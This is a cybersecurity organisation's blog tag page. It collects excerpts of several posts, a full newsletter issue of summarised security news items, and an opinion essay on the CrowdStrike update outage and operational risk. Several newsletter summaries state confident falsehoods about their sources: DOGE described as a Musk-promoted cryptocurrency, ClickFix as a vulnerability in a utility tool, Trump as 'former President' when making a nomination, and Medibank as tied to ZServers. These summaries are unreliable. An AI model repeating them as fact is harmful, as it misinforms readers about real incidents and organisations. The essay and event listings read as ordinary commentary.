Tag: risk management

Cyber (In)Securities – Issue 137

Cyber (In)Securities – Issue 137

Information Security News 1. Oracle Cloud security SNAFU latest: IT giant accused of pedantry as evidence scrubbedThe Register – Thomas ClaburnRead more 2. CoffeeLoader Malware Is Stacked With Viscous Evasion TricksDark Reading – Becky BrackenRead more 3. Phishing platform ‘Lucid’ behind wave of iOS, Android 

Navigating Uncharted Waters: The EU’s Digital Markets Act and Its Impact on Security

Navigating Uncharted Waters: The EU’s Digital Markets Act and Its Impact on Security

The European Union’s Digital Markets Act (DMA) is setting the stage for significant changes in the tech landscape, particularly for companies like Apple, known for their tightly controlled ecosystems. While the DMA aims to enhance competition and consumer choice by opening up platforms like iOS 

Cyber (In)Securities – Issue 125

Information Security News

Joint Letter on the UK Government’s use of Investigatory Powers Act to attack End-to-End Encryption
Global Encryption Coalition by Ryan Polk


The Global Encryption Coalition is actively opposing the UK government’s utilisation of the Investigatory Powers Act to erode end-to-end encryption, asserting that this undermines both personal privacy and national security. An open letter, which is soliciting public signatures until February 20th, has been circulated to garner widespread support against this legislative action. The coalition is urging stakeholders from all sectors to join this campaign, emphasising the critical role of strong encryption in safeguarding secure communications and protecting digital rights against intrusive surveillance.
Read more

US lawmakers press Trump admin to oppose UK’s order for Apple iCloud backdoor
The Register by Brandon Vigliarolo


In a significant stance for digital privacy, US lawmakers are pushing back against the UK’s request for Apple to create a backdoor into its iCloud services. They argue that complying with this demand would compromise user privacy and set a dangerous precedent that could impact global digital security standards. The opposition from US lawmakers underscores the ongoing international debate over encryption and government surveillance, highlighting the delicate balance between ensuring national security and upholding individual privacy rights. They urge a reevaluation of such demands to prevent potential overreach and ensure the protection of digital liberties.
Read more

Rape under wraps: how Tinder, Hinge and their corporate owner chose profits over safety
The Guardian by Elena Dugdale


A detailed investigative report by The Guardian has unveiled significant safety failures by Tinder and Hinge, exposing how their corporate owner has consistently prioritised profit over user safety, especially in addressing incidents of rape connected to their platforms. This serious oversight has led to widespread outrage and urgent calls for reform in the online dating industry. The report underscores the critical need for immediate implementation of stricter safety measures and regulatory oversight. It advocates for a major overhaul of safety protocols on dating platforms to better protect users from potential harm and to hold companies accountable for their safety practices, thereby ensuring a safer online environment for dating app users.
Read more

The Rise of Cyber Espionage: UAV and C-UAV Technologies as Targets
Security Affairs by Pierluigi Paganini


Unmanned Aerial Vehicles (UAVs) and Counter-Unmanned Aerial Vehicle (C-UAV) systems, pivotal for national defense and commercial industries, are facing an uptick in cyber espionage activities. These advanced technologies, integral to modern warfare and surveillance, have become prime targets for state-sponsored cyberattacks aimed at stealing sensitive data or causing operational disruptions. The growing prevalence of such espionage underscores the urgent need for nations to enhance cybersecurity measures around UAVs, encourage international cooperation on cyber defense strategies, and implement robust protocols to protect these critical technologies from foreign interference, ensuring operational security and technological integrity.
Read more

US Coast Guard Urged to Strengthen Cybersecurity Amid $2B Daily Port Risk
Tripwire by Graham Cluley


In light of increasing cyber threats targeting critical infrastructure, the US Coast Guard is urgently called to strengthen its cybersecurity frameworks. Given the agency’s role in securing ports through which goods worth over $2 billion transit daily, enhancing cyber defences is not just beneficial but essential. The necessity for these improvements comes amid reports of potential vulnerabilities that could be exploited to disrupt commercial and security operations at maritime points. Industry experts are advocating for significant investments in cybersecurity, including updated technologies and training, comprehensive threat assessments, and stronger collaborative measures with other national security agencies to safeguard against the sophisticated nature of current cyber threats.
Read more

North Korea targets crypto developers via NPM supply chain attack
The Register by Connor Jones


In a significant revelation, North Korea has been implicated in a series of cyberattacks targeting cryptocurrency developers through the NPM package manager. This method involves inserting malicious code into software dependencies, which can compromise security and steal sensitive information. These attacks not only demonstrate North Korea’s growing sophistication in cyber warfare but also highlight the vulnerabilities inherent in the software development supply chain. The international community is urged to take immediate action by implementing stricter security protocols for software development, enhancing monitoring mechanisms, and fostering collaboration between nations to counter the risks posed by such state-sponsored cyber activities.
Read more

US woman faces years in federal prison for running laptop farm for N Korean IT workers
Bitdefender by Graham Cluley


A US woman is currently facing federal prison for setting up a ‘laptop farm’ allegedly used to provide illicit technological support to North Korean IT workers, breaching international sanctions. This case underscores significant risks in cybersecurity and international relations, highlighting how individuals can contribute to global security threats through seemingly benign activities. It serves as a stark reminder of the importance of stringent enforcement of cybersecurity laws and international sanctions, ensuring that individuals and companies adhere to global norms and prevent the facilitation of unauthorised state-sponsored cyber operations.
Read more

Japan Goes on Offense With New ‘Active Cyber Defense’ Bill
Dark Reading by Nate Nelson


Japan is taking bold steps to bolster its cybersecurity stance with the proposed ‘Active Cyber Defense’ bill, allowing preemptive measures against imminent cyber threats. This legislative effort reflects a strategic pivot towards a more aggressive defense posture in cyberspace, aimed at thwarting cyberattacks before they can cause harm. The move is part of a larger national security strategy to protect critical digital infrastructure and sensitive data from increasingly sophisticated cyber threats posed by rival nations. With this proactive approach, Japan seeks to set a precedent for cybersecurity, emphasising the need for dynamic defensive capabilities and international cooperation in an era where digital threats are rapidly evolving.
Read more

zkLend loses $9.5M in crypto heist, asks hacker to return 90%
BleepingComputer by Lawrence Abrams


In a daring crypto heist, zkLend lost $9.5 million, leading the platform to unusually request the hacker to return 90% of the stolen funds. This incident spotlights the persistent vulnerabilities within cryptocurrency platforms and the unconventional methods entities might resort to when attempting to mitigate losses. The episode has sparked a broader discussion in the crypto community about the security of decentralised finance (DeFi) platforms, the ethical implications of negotiating with cybercriminals, and the need for more stringent regulatory and security measures to protect investors and maintain the integrity of the crypto market.
Read more

Hacker leaks account data of 12 million Zacks Investment users
BleepingComputer by Bill Toulas


A massive data breach at Zacks Investment resulted in the leak of personal account data for 12 million users, exposing them to potential financial and identity theft risks. This breach underscores the continuing challenges financial institutions face in safeguarding sensitive customer information against increasingly sophisticated cyber attacks. The incident has prompted calls for enhanced cybersecurity protocols, including more robust data encryption and real-time monitoring systems, to prevent future breaches and to bolster consumer confidence in the digital security measures of financial services.
Read more

RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset
The Hacker News by Ravie Lakshmanan


The RA World ransomware attack in South Asia has been linked to a toolset commonly used in Chinese espionage, suggesting a state-sponsored origin. This connection illuminates the dual-use nature of cyber tools in espionage and commercial cybercrime, highlighting significant geopolitical cybersecurity concerns. The attack not only disrupted numerous systems but also pointed to the intricate ways in which national security and cybercrime intersect. This event calls for a global reevaluation of cyber defense strategies, emphasising the need for international collaboration to address the multifaceted threats posed by state-affiliated cyber actors.
Read more

Trump to nominate Sean Cairncross as national cyber director
Cybersecurity Dive by David Jones


In a significant political move, former President Trump announced the nomination of Sean Cairncross as national cyber director, signalling a strategic focus on strengthening national cybersecurity infrastructure. Cairncross, known for his previous governmental roles, is expected to bring a robust approach to coordinating cyber defense across federal agencies. His nomination comes at a time when the U.S. faces escalating cyber threats, highlighting the administration’s commitment to bolstering cyber resilience and protecting critical information infrastructure from both domestic and foreign cyber threats.
Read more

CISA Places Election Security Staffers on Leave
Dark Reading by Kristina Beek


As the 2025 election approaches, the Cybersecurity and Infrastructure Security Agency (CISA) has controversially placed several key election security staffers on leave. This move has sparked widespread concern among cybersecurity experts and lawmakers alike, who fear it could undermine the integrity of the upcoming elections. Critics argue that the timing and lack of transparency surrounding these decisions may leave the nation’s election infrastructure vulnerable to cyberattacks, thereby threatening the democratic process. Calls are intensifying for immediate reinstatement of the staff and assurances that election security remains a top priority, emphasising the need for robust, uninterrupted protection against potential threats.
Read more

Probe finds US Coast Guard has left maritime cybersecurity adrift
The Register by Jessica Lyons


A recent investigation has revealed significant cybersecurity lapses within the US Coast Guard, raising alarms over the potential vulnerability of the United States’ maritime sector to cyber threats. The probe highlights a lack of adequate security measures and preparedness against cyberattacks that could jeopardise critical maritime operations and national security. The findings have prompted urgent calls for comprehensive updates to cybersecurity protocols and for increased funding to bolster the Coast Guard’s capacity to defend against sophisticated cyber threats. Stakeholders are urging swift action to shore up defences and ensure the safety of the maritime transport system.
Read more

Triplestrength hits victims with triple trouble: Ransomware, cloud hijacks, crypto-mining
The Register by Jessica Lyons


Triplestrength, a new malicious cyber operation, is wreaking havoc by simultaneously deploying ransomware, hijacking cloud services, and engaging in unauthorised crypto-mining. This multifaceted attack not only encrypts victim data but also commandeers cloud resources and utilises them for mining cryptocurrencies, significantly amplifying the operational and financial impact on affected organisations. The complexity and scope of these attacks underscore a growing trend of cybercriminals leveraging compound strategies to maximise their gains. Cybersecurity experts are calling for a layered defence strategy and heightened vigilance among organisations to detect and mitigate such sophisticated threats.
Read more

Bipartisan Senate bill would strengthen cybercrime penalties
Cyberscoop by Matt Bracken


A bipartisan effort in the US Senate has introduced a bill aimed at significantly strengthening penalties for cybercrimes, reflecting growing legislative focus on combatting cyber threats more aggressively. This bill proposes enhancements to existing laws, including tougher sentences for hackers and more substantial fines for cybercriminal enterprises. The move is seen as a response to the increasing frequency and severity of cyber attacks on national infrastructure and private entities, highlighting the need for a more robust legal framework to deter cybercriminals and protect citizens and businesses from cyber threats.
Read more

Cybersecurity experts fear Elon Musk’s DOGE may enable quantum hackers
NewScientist by Matthew Sparkes


Concerns are mounting among cybersecurity experts that the cryptocurrency DOGE, promoted by Elon Musk, could potentially be vulnerable to quantum hacking due to its cryptographic algorithms. As quantum computing advances, the fear is that these technologies could break traditional encryption methods used by cryptocurrencies, including DOGE. This vulnerability could expose users to unprecedented risks, including theft of funds and breach of transaction privacy. Experts are urging a reevaluation of cryptographic standards in cryptocurrencies to ensure they can withstand the potential future capabilities of quantum computing, thereby safeguarding investments and maintaining the security of digital financial transactions.
Read more

Russian military hackers deploy malicious Windows activators in Ukraine
BleepingComputer by Sergiu Gatlan


Russian military operatives have escalated their cyber warfare tactics by deploying malicious Windows activators in Ukraine, aiming to compromise government and critical infrastructure systems. These activators, which masquerade as legitimate software tools, are in fact laced with malware designed to infiltrate, disrupt, and spy on Ukrainian digital networks. This strategy not only undermines Ukraine’s cybersecurity but also poses a significant threat to the integrity of its national data and operational security. The international cybersecurity community is called upon to support Ukraine in enhancing its defences and to work on developing more robust mechanisms to detect and neutralise such covert cyber threats.
Read more

Adobe Plugs 45 Software Security Holes, Warns of Code Execution Risks
SecurityWeek by Ryan Naraine


Adobe has released a critical update to address 45 vulnerabilities across its range of software, which were found to potentially allow malicious code execution if exploited. This sweeping security update underscores the ongoing risks associated with software vulnerabilities and highlights the necessity for continuous vigilance by users and organisations alike. Adobe urges all users to update their software promptly to mitigate the risks of unauthorised access or data breaches. The move also prompts a broader discussion in the tech community about the importance of regular software maintenance and the implementation of proactive security measures to protect against increasingly sophisticated cyber threats.
Read more

SonicWall firewall exploit lets hackers hijack VPN sessions, patch now
BleepingComputer by Bill Toulas


A significant vulnerability has been discovered in SonicWall’s firewall appliances that could allow hackers to hijack VPN sessions and gain unauthorised access to private networks. The exploit, which affects several models of SonicWall’s hardware, has prompted urgent advisories for organisations to apply the latest patches to avoid potential security breaches. This incident raises concerns about the security of network infrastructure and the critical importance of maintaining up-to-date system patches to defend against sophisticated attacks that target core communication tools like VPNs.
Read more

Microsoft Patches ‘Wormable’ Windows Flaw and File-Deleting Zero-Day
SecurityWeek by Ryan Naraine
Microsoft has responded swiftly to patch a ‘wormable’ flaw in Windows that could allow rapid malware spread across networks, along with a zero-day vulnerability that enables unauthorised file deletion. These patches are part of Microsoft’s latest security efforts to tighten system defences and prevent potential widespread damage. The seriousness of these vulnerabilities, particularly the wormable flaw, highlights the continuous arms race in cybersecurity and the need for persistent updates and user awareness to safeguard personal and organisational data from evolving cyber threats.
Read more

Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks
The Hacker News by Ravie Lakshmanan


Threat actors are exploiting a software vulnerability in ClickFix to deploy the NetSupport Remote Access Trojan (RAT), marking a significant escalation in cyber-attack complexity. This tactic allows hackers to gain control over victims’ systems, enabling data theft, surveillance, and further malicious activities. The use of ClickFix, a widely used utility tool, as a conduit for such attacks highlights the need for robust endpoint security and user education to identify and mitigate threats from seemingly innocuous software applications. Cybersecurity professionals emphasise the importance of comprehensive security strategies that include regular software audits and updates to combat such versatile cyber threats.
Read more

OpenAI Finds No Evidence of Breach After Hacker Offers to Sell 20 Million Credentials
SecurityWeek by Eduard Kovacs


In a recent security scare, a hacker claimed to have access to 20 million user credentials from OpenAI services. However, after thorough investigations, OpenAI announced that they found no evidence of a data breach, attributing the claim possibly to previously compromised data from other sources. This incident has heightened awareness around data security, prompting OpenAI to reassure users of their stringent security measures and encourage stronger password practices and multi-factor authentication. It also serves as a reminder for all organisations to continually assess and update their security protocols to protect against evolving cyber threats.
Read more

iOS 18.3.1 patches an ‘extremely sophisticated attack’ – and more
ZDNet by Adrian Kingsley-Hughes


Apple has released an update for iOS 18.3.1, patching what it describes as an ‘extremely sophisticated attack’ that could have compromised user data. This patch addresses a critical vulnerability that allowed attackers to execute arbitrary code on devices without user interaction. The swift response by Apple highlights the ongoing arms race between technology companies and cybercriminals, underscoring the importance of regular software updates in maintaining security and user trust. Apple’s proactive measures are crucial in defending against these sophisticated attacks that target personal and corporate data.
Read more

Medibank link emerges in multi-country action against ZServers
itNews by Eleanor Dickinson


In a coordinated multi-country law enforcement effort, significant ties have been uncovered between Medibank and the notorious ZServers hosting service, known for facilitating Lockbit ransomware attacks. This revelation points to broader cybersecurity vulnerabilities within corporate networks that could be exploited by ransomware syndicates. The international crackdown reflects a growing trend of cross-border collaborations to combat cybercrime, emphasising the need for enhanced security measures and greater transparency in corporate IT environments to prevent such vulnerabilities from being exploited.
Read more

VeraCore zero-day vulnerabilities exploited in supply chain attacks
Cybersecurity Dive by Rob Wright


Recent discoveries have revealed that VeraCore’s software contains zero-day vulnerabilities that have been actively exploited in several supply chain attacks. These vulnerabilities allowed attackers to infiltrate logistics networks, causing widespread disruption and highlighting significant risks in supply chain security. The incident has prompted urgent calls for software vendors to prioritise the security of their products by implementing comprehensive vulnerability management programs and for businesses to conduct regular security assessments to mitigate the risk of similar attacks affecting their operations.
Read more

Australia, US, UK target ZServers over Lockbit ransomware attacks
itNews


In a significant international law enforcement effort, agencies from Australia, the US, and the UK have coordinated to target Zservers, a notorious platform known for facilitating Lockbit ransomware attacks. This joint operation reflects a robust global stance against cybercriminals who leverage ransomware to disrupt and extort businesses and government agencies worldwide. By dismantling a key node in the ransomware ecosystem, this collaborative action aims to disrupt the operations of cybercriminals significantly, enhance global cybersecurity resilience, and set a precedent for future international cooperation against digital threats.
Read more

ANALYSIS

How Public & Private Sectors Can Better Align Cyber Defense
Dark Reading by Chris Henderson


The necessity for improved alignment between public and private sectors in cyber defense strategies is becoming increasingly critical as cyber threats evolve. This article explores this topic, advocating for a more integrated approach where governmental agencies and private companies share intelligence, tools, and strategies to combat cyber threats effectively. It goes on to suggest establishing formal frameworks and partnerships that facilitate real-time data exchange and collaborative response mechanisms. Such integration is intended to enhance the overall security posture of both sectors, enabling more agile and effective responses to cyber incidents and reducing the impact of breaches.
Read more

3 Ways Nonprofits Can Strengthen Their Cybersecurity in 2025
Biz Tech by Matt Morgan


As nonprofits become increasingly reliant on digital technologies, ‘Biz Tech’ outlines three strategic ways these organisations can enhance their cybersecurity in 2025. First, adopting a tailored cybersecurity framework that addresses specific vulnerabilities unique to the nonprofit sector. Second, investing in comprehensive staff training to recognise and respond to cyber threats proactively. Third, forming partnerships with technology firms to access cutting-edge security tools at reduced costs. These measures are crucial for safeguarding sensitive data, maintaining donor trust, and ensuring the continuity of services amidst a landscape of escalating cyber risks.
Read more

Top cybersecurity trends to watch in 2025
JP Morgan


JP Morgan’s report on the top cybersecurity trends for 2025 provides crucial insights for organisations aiming to stay ahead of emerging threats. Highlighting the integration of artificial intelligence in threat detection and response, the expansion of data privacy regulations, and the adoption of zero-trust security architectures, the report emphasises the need for businesses to adapt swiftly. These trends are expected to define the cybersecurity landscape, necessitating strategic adjustments in corporate security policies and IT infrastructures to mitigate risks and comply with new regulatory requirements effectively.
Read more

WTF? Why the cybersecurity sector is overrun with acronyms
CSO Australia by Lee-Anne Goodman


CSO Australia critically examines the pervasive use of acronyms within the cybersecurity sector, arguing that this jargon complicates communication and can alienate newcomers or non-specialists. The article calls for a paradigm shift towards clearer, more accessible language that facilitates understanding and collaboration across diverse stakeholders. By standardising terminology and simplifying explanations, the cybersecurity community can enhance operational efficiency, improve stakeholder engagement, and foster a more inclusive environment that attracts a broader range of talent and expertise.
Read more

How fake security reports are swamping open-source projects, thanks to AI
ZDNet by Steven Vaughan-Nichols


ZDNet explores a troubling trend where artificial intelligence is being used to generate fake security reports, overwhelming open-source projects with fraudulent vulnerability claims. Steven Vaughan-Nichols details how these AI-generated reports, which often appear technically plausible, can deceive project maintainers, leading to unnecessary alarms and wasted resources. This surge in fake reports not only strains the open-source community but also risks undermining trust in genuine security warnings. The article calls for enhanced verification processes and AI detection tools to combat this new form of cyber deception, urging the community to develop strategies to distinguish between legitimate and AI-generated reports to maintain the integrity of open-source software development.
Read more

Protecting Your Software Supply Chain: Assessing the Risks Before Deployment
The Hacker News


The importance of securing the software supply chain has never been more critical, as highlighted in a comprehensive analysis by The Hacker News. This article details strategies for assessing and mitigating risks before software deployment, emphasising the need for rigorous security audits and vulnerability assessments throughout the development lifecycle. By integrating these practices, companies can prevent the infiltration of malicious code and unauthorised access, safeguarding their operations from the ground up. The piece advocates for a holistic approach, combining technology solutions with staff training and robust policy frameworks to create a resilient defense against evolving cyber threats.
Read more

Zero Trust: Redefining cybersecurity for the modern era
Intelligent CISO by Alasdair Anderson


Intelligent CISO delves into the Zero Trust security model, advocating for its adoption as the foundation for modern cybersecurity strategies. This approach, which assumes that threats could be internal as well as external, requires verification at every step of digital interactions, fundamentally changing how organisations secure their IT environments. The article explains how Zero Trust architectures can prevent data breaches by continuously authenticating user identities and access rights, thereby minimising the risk of insider threats and external attacks. Implementing Zero Trust not only enhances security but also aligns with evolving regulatory landscapes and technological advancements.
Read more

Major Cyber Attacks in Review: January 2025
SOC Radar


SOC Radar’s report on major cyber attacks in January 2025 provides a sobering overview of the cybersecurity challenges faced globally. It details significant incidents that have impacted government agencies, enterprises, and non-profits, illustrating the sophisticated tactics used by cybercriminals. The analysis stresses the urgency for organisations to adopt proactive defense strategies, such as advanced threat detection systems and incident response plans, to mitigate the impacts of such attacks. The report serves as a call to action for heightened vigilance and strategic planning in the face of the dynamic and persistent threat landscape.
Read more

CyAN Members: Op Eds, Articles, etc:

Your Browser’s Betrayal: Understanding Syncjacking Attacks
Kim Chandler McDonald


In an insightful piece by CyAN Global VP Kim Chandler McDonald, the concept of ‘syncjacking,’ a new form of cyber attack that exploits browser synchronisation features to steal personal information, is thoroughly examined. This article explores how attackers manipulate synced data across devices to gain unauthorised access to sensitive information, compromising user privacy and security. McDonald provides practical advice on how to protect oneself from such attacks, including the use of more secure synchronisation methods and regular audits of sync settings. The piece highlights the need for continuous education on emerging cyber threats to keep personal and organisational data safe.
Read more

CyAN Members: News

  • CyAN board member Gergely Dzsinich will discuss global privacy law and cyber topics affecting the EU, the USA, and China at the International Air Transport Association (IATA) World Legal Symposium in Shanghai, 18-20 February. His talk will specifically address issues like data transfers and the unique topic of biometrics.
  • CyAN Member Yedhu Krishna Menon will be presenting on the topic of “Future of Cybersecurity in Nth Party Supply Chain” — exploring the importance of CollaborativeDefense in managing security risks across extended supply chains at the Third-Party Risk Management (TPRM) Conference in Riyadh, Saudi Arabia, on May 7th and 8th!
    More info

Upcoming CyAN Global Events:

  • Breaking the Cycle: Combating Online IBSA for a Safer Digital Experience – Webinar, March 6th (EST 6AM, CET 12PM, AEST 10PM)
    Read more
  • CyAN APAC: The Geopolitical Impacts of Cyber Threats: From Espionage to Influence – Keynote by Dan Elliot, March 12, Peoplebank, Sydney (save the date, general release tickets available soon!)
  • GITEX AFRICA, Marrakesh, Morocco: 14-16 April
    Read more
  • GITEX ASIA, Singapore (Marina Bay Sands): 23-25 April
    Read more
  • GISEC, Dubai Word Trade Center, Dubai, UAE: 6th to 8th May
    Read more
  • The Cyber Outstanding Security Performance Awards (Cyber OSPAs), May 8, London, UK
    Read more
  • MaTeCC, Rabat, Morocco: 7-9 June, 2025 (The third annual North Africa and beyond cybersecurity event, hosted by CyAN partner organisation École High-Tech.)
    Read more

Cyber (In)Securities – Issue 121

Information Security News: US Cyber Agency’s Future Role in Elections Remains Murky Under the Trump Administration Security Week via Associated PressThe role of the US Cybersecurity and Infrastructure Security Agency (CISA) in safeguarding elections is increasingly uncertain under the Trump administration. While CISA played a 

Faking GitHub Commits – What Could Go Wrong?

Faking GitHub Commits – What Could Go Wrong?

Found: a tool creating dummy GitHub source code commits to help programmers game job evaluation mechanisms. This illustrates a deeper issue with how badly designed incentives can have serious security consequences.

Some Quick Thoughts on the Crowdstrike “Issue”

Some Quick Thoughts on the Crowdstrike “Issue”

Note: these are purely my opinions, not those of CyAN or any of my clients.

Last week, security vendor CrowdStrike deployed an update to its Falcon EDR (Endpoint Detection and Response) software agent to millions of systems running Microsoft Windows. Due to a faulty system file, affected hosts suffered “blue screen of death crashes”, leading to major impact across multiple critical industries. Microsoft Azure went down, multiple airlines suspended flights, hospital operations were slowed, while IT operations teams scrambled to undo the update, often manually across thousands of machines. Microsoft has since issued a repair tool.

Fellow CyAN member, and member of the governing board, Kim Chandler McDonald, recently posted an article on her LinkedIn feed about the dangers of software monoculture, with parallels to risks from monocultures in nature. Kim also shares recommendations for good practices on mitigating monoculture risks in the first place – as with all of her pieces, it’s worth a read.

The monoculture issue is a known one, and has been a known problem with various types of software. For example, since Microsoft Windows established dominance across the global desktop and much of the server market, cyberattacks that are often commoditized have caused significant and widespread problems1.

To its credit, Microsoft has been a demonstrably “good citizen” since introducing patch Tuesdays in the early 2000s, and becoming increasingly communicative about vulnerabilities and bug fixes, not to mention being an active and helpful part of the global anti-cybercrime ecosystem, which has significantly reduced the risk from another Code Red worm. That said, breaches of widely used software platforms such as SolarWinds, as well as critical vulnerabilities in omnipresent components such as Log4J underscore that monocultures engender massive systemic vulnerability.

As much as I agree with Kim’s article, I believe that what we know so far (!) about the Crowdstrike issue merits a few additional discussions.

First, that of vendor software quality assurance. Now comes the hindsight armchair quarterbacking. Ready?

Here’s an analysis of how what supposedly caused the bug in the Falcon update. Here’s another one casting doubt on that explanation (apologies for Twitter links), and speculating about a reason why Crowdstrike QA didn’t catch the problem. A post asking why kernel drivers are written in C/C++, which can have memory issues (but referencing the first post – I make no comment on the accuracy of any of these). Another comment (in my opinion rightfully) stating that no EDR software should rely on kernel mode drivers. I’ve also read comments in numerous private groups I’m a member of claiming that Crowdstrike did not perform, at least not sufficiently, code fuzzing, and that it bypassed Microsoft driver signing – admittedly not required by Microsoft outside of machines using secure boot.

Software will always have bugs and security vulnerabilities, which is one reason why the debate about vendor liability has been ongoing since at least the late 1990s. Crowdstrike is not the first major security vendor to cause outages with updates – among others, Kaspersky and McAfee in 2010 (bizarrely, when Crowdstrike’s current CEO was CTO at McAfee) have both caused problems with updates. Software vendor contracts are usually very clear about refusing any liability for potential bugs.

Like many other tech vendors, Crowdstrike laid off significant numbers of staff in 2023, including a lot of engineers, developers, and QA testers. On its own, this is already concerning. I’ve always supported stricter regulations regarding supply chain risk management and vendor responsibility for processes and adequate resource investment for risk mitigation.

Perfect testing and QA procedures with enough resources would not have guaranteed that a defective update didn’t go out. But a defective update did go out, and it did take out millions of important systems. Thus, something went very, very wrong. QED. No argument about technical, procedural, or legal finesses will change this.

Second is the equally important topic of operational risk management. Without victim blaming, this is partially the fault of Crowdstrike users, and strongly related to the software monoculture issue. Just as it’s impossible to guarantee security of a system, it’s also very difficult to retain a complete overview of all IT assets, versions, dependencies, etc. in complex environments.

Nonetheless, the sheer level of chaos introduced across multiple industries by a single component failing, and the difficulty in recovering from it (many systems are still offline and expected to remain so for some time) points to a systemic failure of operational risk awareness and incident response playbooks at firms affected by the bug.

Regulations such as the EU’s NIS2 Directive, and good practice standards, have focused primarily on third party information security risk management. More advanced organizations have successfully quantified infosec risk and mapped it to other, more fundamental risk management metrics. The CrowdStrike outage demonstrated conclusively that this is not the case for a lot of operational IT risk – basically, what are my dependencies, how bad would it be if one of them failed, and how can I mitigate or at least work around it?

Even if you can’t guard against a buggy update of a vital system component, you should at least know what those components are, how valuable they are, and how to work around their failure. A colleague recounted an example of a client that, having been burned by two recent breaches, had implemented backup processes using pen and paper to ensure continuity of operations in case of a major IT outage. This was neither optimal nor efficient, but it worked.

I’m a pessimist, and I like placing blame for failures on leadership when there’s even a hint that negligence or underinvestment in the pursuit of higher profits were weighty contributing factors to a crisis. That’s part of why CEOs are paid a lot of money. While the sheer size of the problem strongly screams that someone screwed up, there’s always the possibility that this was not the case. Nonetheless, I firmly believe that the coming months will see a torrent of lawsuits, legislative investigations, and stricter regulations around all of the above issues – software monoculture, resilience testing and QA, and operational risk management. I am convinced that these will cause major problems not only for CrowdStrike, but also for many of its clients in critical sectors whose readiness was found to be lacking.

The worst case scenario is that C-levels will draw the wrong conclusions and somehow blame their information security teams. This was not a security issue.

  1. There’s an argument to be made here about the prevalence of Linux, and how it runs a sizeable portion of critical infrastructure. The breadth of Linux flavors and vendors, as well as its use for a lot of the world’s most important IT systems that are frequently hidden deep in the backend from not only “average users” but even a lot of C*Os means that it’s almost impossible to get good statistics on Linux usage outside of when it’s used for web servers, or in mostly public-sector large desktop deployments. This diversity, on top of Linux’ strong security-conscious architecture, and the greater exposure of open source software to scrutiny by bug hunters, makes it far more resilient and resistant to major security threats. Most of the time. ↩︎

🔍 Exploring the Nexus: NIST Framework vs. DORA Regulation in the Financial Sector 🌐💼

CyAN member Gilles Chevillon shares an analysis of the Digital Operational Resilience Act, the European Union’s flagship regulation governing cybersecurity in the financial sector.